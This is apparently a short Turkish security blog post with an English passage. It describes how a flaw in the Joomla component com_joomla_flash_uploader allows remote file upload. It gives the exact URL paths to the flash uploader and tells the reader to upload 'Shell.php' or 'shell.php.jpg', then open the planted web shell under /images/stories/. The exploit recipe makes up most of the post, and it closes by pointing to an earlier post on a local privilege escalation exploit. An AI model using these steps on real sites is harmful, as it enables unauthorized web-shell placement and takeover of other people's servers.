Joomla com_joomla_flash_uploader eklentisinde bulunan açık sayesinde uzaktan dosya upload edilebiliyor.
Uzaktan upload edilebilen php shell scriptlerin tehlikelerinden daha önce bahsetmiştim.
First Go to ==> http://localhost/index.php?option=com_joomla_flash_uploader&Itemid=[id]
You Will Find a Flash Uploader Or Go To http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf You Can Upload Your Shell.php or shell.php.jpg In The Flash Uploader you'll see Your Shell !! 4 example ==> Upload folder: ./images/stories/ ==> Your shell => http://localhost//images/stories/shell.php
Bir önceki yazımız olan Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability başlıklı makalemizde Smartfren Connex EC Local exploit ve windows local exploit hakkında bilgiler verilmektedir.